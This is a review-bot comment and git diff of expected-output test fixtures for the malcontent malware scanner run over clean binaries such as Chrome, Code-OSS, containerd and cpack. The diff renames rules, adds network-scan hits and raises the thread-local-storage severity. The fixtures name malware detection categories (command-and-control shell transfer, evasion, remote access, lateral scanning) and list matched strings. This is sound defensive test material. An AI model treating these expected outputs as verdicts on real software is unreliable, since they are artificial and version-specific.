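Review bot: `process/thread_local_storage` is raised from low to medium in the clean `chrome` fixture here (hunk `@@ -164,7 +164,7 @@`) and likewise in the clean `clickhouse` and `code-oss` fixtures below, where the only recorded evidence is the `__tls_get_addr` symbol that any dynamically linked binary using thread-local variables references. If the bump is intentional (the change to rules/process/thread_local_storage.yara is outside this view), the rule description should state what makes a plain TLS lookup a medium-risk signal on its own; otherwise keeping it low and reserving medium for co-occurrence with a stronger indicator would avoid adding a new medium hit to every clean desktop binary.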
@@ -53,9 +53,8 @@ discover/user/HOME: low
 discover/user/USER: low
 discover/user/name_get: low
 evasion/bypass_security/linux/ufw: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/relative_hidden: low
+evasion/file/location/dev_shm: medium
+evasion/file/prefix: medium
 evasion/hijack_execution/DYLD_LIBRARY_PATH: medium
 evasion/hijack_execution/LD_LIBRARY_PATH: low
 evasion/logging/acct: low
@@ -69,6 +68,7 @@ exec/install_additional/package_install: medium
 exec/plugin: low
 exec/program: medium
 exec/program/background: low
+exec/program/hidden: low
 exec/shell/SHELL: low
 exec/shell/TERM: low
 exec/shell/background_sleep: medium
@@ -182,7 +182,7 @@ process/executable_path: low
 process/groupid_set: low
 process/multithreaded: low
 process/name_get: medium
-process/thread_local_storage: low
+process/thread_local_storage: medium
 process/userid_set: low
 sus/exclamation: medium
 sus/intercept: medium
diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md
index e15d38abd..8b919a187 100644
--- a/tests/linux/clean/code-oss.md
+++ b/tests/linux/clean/code-oss.md
@@ -59,6 +59,7 @@
 | MEDIUM | [impact/ransom/decryptor](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ransom/decryptor.yara#decryptor) | References 'decryptor' | [decryptor](https://github.com/search?q=decryptor&type=code) |
 | MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [Failed to deserialized Heartbeat info pa](https://github.com/search?q=Failed+to+deserialized+Heartbeat+info+pa&type=code)
[Invalid heartbeat info:](https://github.com/search?q=Invalid+heartbeat+info%3A&type=code)
[No Heartbeat Info pa](https://github.com/search?q=No+Heartbeat+Info+pa&type=code)
[heartbeat:](https://github.com/search?q=heartbeat%3A&type=code)
[heartbeat_handler](https://github.com/search?q=heartbeat_handler&type=code) | | MEDIUM | [lateral/scan/target_ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/target_ip.yara#target_ip) | References a target IP | [target IP](https://github.com/search?q=target+IP&type=code)
[target_ip](https://github.com/search?q=target_ip&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[banner](https://github.com/search?q=banner&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [DnsOverHttps](https://github.com/search?q=DnsOverHttps&type=code)
[application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) | | MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | | MEDIUM | [net/http/content_length_0](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/content-length-0.yara#content_length_0) | Sets HTTP content length to zero | [Content-Length: 0](https://github.com/search?q=Content-Length%3A+0&type=code) | @@ -82,6 +83,7 @@ | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) | | MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [looks up memory addresses for thread local storage or linked libraries](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[0 !!!!](https://github.com/search?q=0+++++++%21%21%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!!](https://github.com/search?q=12366++++++%21%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH++++%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[AGG !!](https://github.com/search?q=AGG+++++%21%21&type=code)
[CGIJMOQS !!](https://github.com/search?q=CGIJMOQS++++%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[EE !!](https://github.com/search?q=EE++++%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptorConfig](https://github.com/search?q=interceptorConfig&type=code)
[interceptorEv](https://github.com/search?q=interceptorEv&type=code)
[interceptor_config](https://github.com/search?q=interceptor_config&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | @@ -105,13 +107,13 @@ | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [evasion/hidden_paths/relative_hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/relative-hidden.yara#relative_hidden_launcher) | relative hidden launcher | [./.691.9B](https://github.com/search?q=.%2F.691.9B&type=code)
[bash](https://github.com/search?q=bash&type=code)
[exec](https://github.com/search?q=exec&type=code)
[system](https://github.com/search?q=system&type=code) | | LOW | [evasion/hijack_execution/LD_LIBRARY_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hijack_execution/LD_LIBRARY_PATH.yara#ld_library_path) | ld library path | [LD_LIBRARY_PATH](https://github.com/search?q=LD_LIBRARY_PATH&type=code) | | LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | | LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | | LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Chromium PDF Plugin](https://github.com/search?q=Chromium+PDF+Plugin&type=code)
[ContainsPlugins](https://github.com/search?q=ContainsPlugins&type=code)
[Failed to generate a plugin id](https://github.com/search?q=Failed+to+generate+a+plugin+id&type=code)
[GetPluginInfo](https://github.com/search?q=GetPluginInfo&type=code)
[GetPlugins](https://github.com/search?q=GetPlugins&type=code)
[If you want to block plugins](https://github.com/search?q=If+you+want+to+block+plugins&type=code)
[Is an accelerated plugin](https://github.com/search?q=Is+an+accelerated+plugin&type=code)
[LoadPluginsSoon](https://github.com/search?q=LoadPluginsSoon&type=code)
[No PPP_GetInterface in plugin library](https://github.com/search?q=No+PPP_GetInterface+in+plugin+library&type=code)
[No PPP_InitializeModule in plugin library](https://github.com/search?q=No+PPP_InitializeModule+in+plugin+library&type=code)
[OnPepperPluginCrashed](https://github.com/search?q=OnPepperPluginCrashed&type=code)
[OnPepperPluginHung](https://github.com/search?q=OnPepperPluginHung&type=code)
[OpenChannelToPepperPlugin](https://github.com/search?q=OpenChannelToPepperPlugin&type=code)
[Pepper Plugin Broker](https://github.com/search?q=Pepper+Plugin+Broker&type=code)
[PepperPluginInstance](https://github.com/search?q=PepperPluginInstance&type=code)
[Plugin Changed](https://github.com/search?q=Plugin+Changed&type=code)
[Plugin URL](https://github.com/search?q=Plugin+URL&type=code)
[Plugin doesn](https://github.com/search?q=Plugin+doesn&type=code)
[PluginArray](https://github.com/search?q=PluginArray&type=code)
[PluginContextSecurity](https://github.com/search?q=PluginContextSecurity&type=code)
[PluginData](https://github.com/search?q=PluginData&type=code)
[PluginDispatcher](https://github.com/search?q=PluginDispatcher&type=code)
[PluginLoad](https://github.com/search?q=PluginLoad&type=code)
[PluginPrivate](https://github.com/search?q=PluginPrivate&type=code)
[PluginRegistry](https://github.com/search?q=PluginRegistry&type=code)
[PluginResource](https://github.com/search?q=PluginResource&type=code)
[PluginService](https://github.com/search?q=PluginService&type=code)
[PluginSizeUpdated](https://github.com/search?q=PluginSizeUpdated&type=code)
[PpapiMsg_LoadPlugin](https://github.com/search?q=PpapiMsg_LoadPlugin&type=code)
[PpapiPluginMain](https://github.com/search?q=PpapiPluginMain&type=code)
[PpapiPluginMetrics](https://github.com/search?q=PpapiPluginMetrics&type=code)
[RemoveBrowserPluginEmbedder](https://github.com/search?q=RemoveBrowserPluginEmbedder&type=code)
[SendToPlugin](https://github.com/search?q=SendToPlugin&type=code)
[SetBrowserPluginGuest](https://github.com/search?q=SetBrowserPluginGuest&type=code)
[The plugin has not](https://github.com/search?q=The+plugin+has+not&type=code)
[Unable to create ppapi plugin process](https://github.com/search?q=Unable+to+create+ppapi+plugin+process&type=code)
[Unable to load plugin](https://github.com/search?q=Unable+to+load+plugin&type=code)
[Unable to load ppapi plugin](https://github.com/search?q=Unable+to+load+ppapi+plugin&type=code)
[allowNonEmptyNavigatorPlugins](https://github.com/search?q=allowNonEmptyNavigatorPlugins&type=code)
[as a plugin](https://github.com/search?q=as+a+plugin&type=code)
[browserplugin](https://github.com/search?q=browserplugin&type=code)
[enabledPlugin](https://github.com/search?q=enabledPlugin&type=code)
[html_plugin_element](https://github.com/search?q=html_plugin_element&type=code)
[kPluginObject](https://github.com/search?q=kPluginObject&type=code)
[loadplugin](https://github.com/search?q=loadplugin&type=code)
[of theremnants ofpluginspage](https://github.com/search?q=of+theremnants+ofpluginspage&type=code)
[page contains plugins](https://github.com/search?q=page+contains+plugins&type=code)
[pdf_internal_plugin_wrapper](https://github.com/search?q=pdf_internal_plugin_wrapper&type=code)
[pdf_view_plugin_base](https://github.com/search?q=pdf_view_plugin_base&type=code)
[pdf_view_web_plugin](https://github.com/search?q=pdf_view_web_plugin&type=code)
[pepper_hung_plugin_filter](https://github.com/search?q=pepper_hung_plugin_filter&type=code)
[pepper_webplugin_impl](https://github.com/search?q=pepper_webplugin_impl&type=code)
[plugin data](https://github.com/search?q=plugin+data&type=code)
[pluginObject](https://github.com/search?q=pluginObject&type=code)
[plugin_audio_thread](https://github.com/search?q=plugin_audio_thread&type=code)
[plugin_container_impl](https://github.com/search?q=plugin_container_impl&type=code)
[plugin_instance_impl](https://github.com/search?q=plugin_instance_impl&type=code)
[plugin_message_filter](https://github.com/search?q=plugin_message_filter&type=code)
[plugin_module](https://github.com/search?q=plugin_module&type=code)
[plugin_private_storage](https://github.com/search?q=plugin_private_storage&type=code)
[plugin_process_host](https://github.com/search?q=plugin_process_host&type=code)
[plugin_service_impl](https://github.com/search?q=plugin_service_impl&type=code)
[pluginprH](https://github.com/search?q=pluginprH&type=code)
[pluginsEnabled](https://github.com/search?q=pluginsEnabled&type=code)
[pluginspace](https://github.com/search?q=pluginspace&type=code)
[pluginswithin](https://github.com/search?q=pluginswithin&type=code)
[pluginurl](https://github.com/search?q=pluginurl&type=code)
[ppapi_plugin_main](https://github.com/search?q=ppapi_plugin_main&type=code)
[ppapi_plugin_process](https://github.com/search?q=ppapi_plugin_process&type=code)
[r PluginH](https://github.com/search?q=r+PluginH&type=code)
[relativebringingincreasegovernorplugins](https://github.com/search?q=relativebringingincreasegovernorplugins&type=code)
[security origin than your plugin](https://github.com/search?q=security+origin+than+your+plugin&type=code)
[strictMixedContentCheckingForPlugin](https://github.com/search?q=strictMixedContentCheckingForPlugin&type=code)
[suggestplugin](https://github.com/search?q=suggestplugin&type=code) | | LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [exec/program/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/hidden.yara#relative_hidden_launcher) | relative hidden launcher | [./.691.9B](https://github.com/search?q=.%2F.691.9B&type=code)
[bash](https://github.com/search?q=bash&type=code)
[exec](https://github.com/search?q=exec&type=code)
[system](https://github.com/search?q=system&type=code) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [CreateDirectoryAndGetEr](https://github.com/search?q=CreateDirectoryAndGetEr&type=code)
[CreateDirectoryResult](https://github.com/search?q=CreateDirectoryResult&type=code)
[createFolder](https://github.com/search?q=createFolder&type=code)
[mkdir](https://github.com/search?q=mkdir&type=code) | | LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | @@ -171,6 +173,5 @@ | LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | | LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | | LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | -| LOW | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [Uses glibc thread local storage](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/containerd.simple b/tests/linux/clean/containerd.simple index 6c40382aa..a3083b132 100644 --- a/tests/linux/clean/containerd.simple +++ b/tests/linux/clean/containerd.simple 
@@ -27,9 +27,9 @@ discover/system/cpu_info: low
 discover/system/hostname_get: low
 discover/system/platform: medium
 discover/user/USER: low
-evasion/covert_location/dev_mqueue: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/dev_mqueue: medium
+evasion/file/location/dev_shm: medium
+evasion/file/location/var_run: medium
 evasion/process_injection/ptrace: medium
 exec/plugin: low
 exec/program: medium
@@ -73,6 +73,7 @@ fs/watch: low
 hw/dev/block_ice: medium
 hw/dev/mapper: medium
 impact/remote_access/heartbeat: medium
+lateral/scan/tool: medium
 net/dns: low
 net/dns/reverse: medium
 net/dns/servers: low
diff --git a/tests/linux/clean/cpack.md b/tests/linux/clean/cpack.md
index f81da4983..cd340dd51 100644
--- a/tests/linux/clean/cpack.md
+++ b/tests/linux/clean/cpack.md
@@ -11,7 +11,7 @@
 | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) | | MEDIUM | [discover/processes/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/processes/list.yara#ps_exec) | ps exec | [#!](https://github.com/search?q=%23%21&type=code)
[ps ax](https://github.com/search?q=ps+ax&type=code) | | MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#os_release) | [operating-system identification](https://developer.apple.com/documentation/os/1524245-os_release) | [os_release](https://github.com/search?q=os_release&type=code) | -| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | +| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [N_125cmFunctionFunctionBlocker16StartCommandNameEv](https://github.com/search?q=N_125cmFunctionFunctionBlocker16StartCommandNameEv&type=code)
[StartupCommands](https://github.com/search?q=StartupCommands&type=code)
[_N_122cmBlockFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_122cmBlockFunctionBlocker16StartCommandNameEv&type=code)
[_N_122cmMacroFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_122cmMacroFunctionBlocker16StartCommandNameEv&type=code)
[_N_124cmForEachFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_124cmForEachFunctionBlocker16StartCommandNameEv&type=code)
[_ZN13cmSystemTools23s_RunCommandHideConsoleE](https://github.com/search?q=_ZN13cmSystemTools23s_RunCommandHideConsoleE&type=code)
[_ZN13cmSystemTools25s_DisableRunCommandOutputE](https://github.com/search?q=_ZN13cmSystemTools25s_DisableRunCommandOutputE&type=code)
[_ZNK19cmIfFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_ZNK19cmIfFunctionBlocker16StartCommandNameEv&type=code)
[_ZNK22cmWhileFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_ZNK22cmWhileFunctionBlocker16StartCommandNameEv&type=code)
[_ZZN12_GLOBAL__N_117TryRunCommandImpl18DoNotRunExecutableERKNSt7_](https://github.com/search?q=_ZZN12_GLOBAL__N_117TryRunCommandImpl18DoNotRunExecutableERKNSt7_&type=code)
[cmExecuteCommand](https://github.com/search?q=cmExecuteCommand&type=code) | | MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) | @@ -30,6 +30,7 @@ | MEDIUM | [fs/proc/meminfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/meminfo.yara#proc_meminfo_val) | get memory info | [/proc/meminfo](https://github.com/search?q=%2Fproc%2Fmeminfo&type=code) | | MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | | MEDIUM | [impact/remote_access/crypto_listen_socks](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/crypto_listen_socks.yara#socks_crypto_listener) | socks crypto listener | [SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socks5](https://github.com/search?q=socks5&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | | MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) | | MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [CPACK_DOWNLOAD_ALL](https://github.com/search?q=CPACK_DOWNLOAD_ALL&type=code)
[CPACK_DOWNLOAD_SITE](https://github.com/search?q=CPACK_DOWNLOAD_SITE&type=code)
[CPACK_IFW_DOWNLOAD_ALL](https://github.com/search?q=CPACK_IFW_DOWNLOAD_ALL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL&type=code)
[CPACK_USES_DOWNLOAD](https://github.com/search?q=CPACK_USES_DOWNLOAD&type=code)
[Call DownloadFile](https://github.com/search?q=Call+DownloadFile&type=code)
[DOWNLOAD HASH mismatch](https://github.com/search?q=DOWNLOAD+HASH+mismatch&type=code)
[DOWNLOAD cannot set TLS](https://github.com/search?q=DOWNLOAD+cannot+set+TLS&type=code)
[DOWNLOAD cannot set http](https://github.com/search?q=DOWNLOAD+cannot+set+http&type=code)
[DOWNLOAD cannot set url](https://github.com/search?q=DOWNLOAD+cannot+set+url&type=code)
[DOWNLOAD cannot set user](https://github.com/search?q=DOWNLOAD+cannot+set+user&type=code)
[DOWNLOAD error](https://github.com/search?q=DOWNLOAD+error&type=code)
[DOWNLOAD missing ALGO](https://github.com/search?q=DOWNLOAD+missing+ALGO&type=code)
[DOWNLOAD missing VAR for](https://github.com/search?q=DOWNLOAD+missing+VAR+for&type=code)
[Maxdownload](https://github.com/search?q=Maxdownload&type=code)
[VERIFY_DOWNLOADS](https://github.com/search?q=VERIFY_DOWNLOADS&type=code)
[_DOWNLOADED](https://github.com/search?q=_DOWNLOADED&type=code)
[completely downloaded](https://github.com/search?q=completely+downloaded&type=code)
[compute hash on downloaded file](https://github.com/search?q=compute+hash+on+downloaded+file&type=code)
[cw_download_write](https://github.com/search?q=cw_download_write&type=code)
[download_write body](https://github.com/search?q=download_write+body&type=code)
[download_write header](https://github.com/search?q=download_write+header&type=code)
[for the URL download method](https://github.com/search?q=for+the+URL+download+method&type=code)
[hash on failed download](https://github.com/search?q=hash+on+failed+download&type=code)
[is already downloaded](https://github.com/search?q=is+already+downloaded&type=code)
[isDownloaded](https://github.com/search?q=isDownloaded&type=code)
[maxdownload](https://github.com/search?q=maxdownload&type=code)
[partial download completed](https://github.com/search?q=partial+download+completed&type=code)
[protected CPackDownloadArchives](https://github.com/search?q=protected+CPackDownloadArchives&type=code)
[protected CPackDownloadComponents](https://github.com/search?q=protected+CPackDownloadComponents&type=code)
[protected CPackDownloadCount](https://github.com/search?q=protected+CPackDownloadCount&type=code)
[protected CPackDownloadHashes](https://github.com/search?q=protected+CPackDownloadHashes&type=code)
[protected CPackDownloadUrls](https://github.com/search?q=protected+CPackDownloadUrls&type=code)
[skipping download as file already](https://github.com/search?q=skipping+download+as+file+already&type=code)
[t resume download](https://github.com/search?q=t+resume+download&type=code) | | MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl to download a file | [curl due to a build-time decision.](https://github.com/search?q=curl+due+to+a+build-time+decision.&type=code)
[curl function was given a bad argument](https://github.com/search?q=curl+function+was+given+a+bad+argument&type=code)
[curl is built without the HTTPS-proxy support.](https://github.com/search?q=curl+is+built+without+the+HTTPS-proxy+support.&type=code)
[curl lacks IDN support](https://github.com/search?q=curl+lacks+IDN+support&type=code)
[curl offers](https://github.com/search?q=curl+offers&type=code)
[curl understands](https://github.com/search?q=curl+understands&type=code)
[curl user interface](https://github.com/search?q=curl+user+interface&type=code) | diff --git a/tests/linux/clean/default_config.json.simple b/tests/linux/clean/default_config.json.simple index 92c43b7f1..c87b72cff 100644 --- a/tests/linux/clean/default_config.json.simple +++ b/tests/linux/clean/default_config.json.simple @@ -25,7 +25,7 @@ discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/iptables: medium evasion/bypass_security/linux/ufw: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/logging/acct: low evasion/process_injection/readelf: medium exec/plugin: low @@ -53,6 +53,7 @@ hw/wireless: low impact/exploit: medium impact/exploit/cve: medium impact/remote_access/iptables: medium +lateral/scan/tool: medium net/dns/servers: low net/download: medium net/http/cookies: medium diff --git a/tests/linux/clean/emscripten.sh.simple b/tests/linux/clean/emscripten.sh.simple index c52f451b3..08f914c03 100644 --- a/tests/linux/clean/emscripten.sh.simple +++ b/tests/linux/clean/emscripten.sh.simple @@ -1,6 +1,6 @@ # linux/clean/emscripten.sh: medium c2/tool_transfer/shell: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium 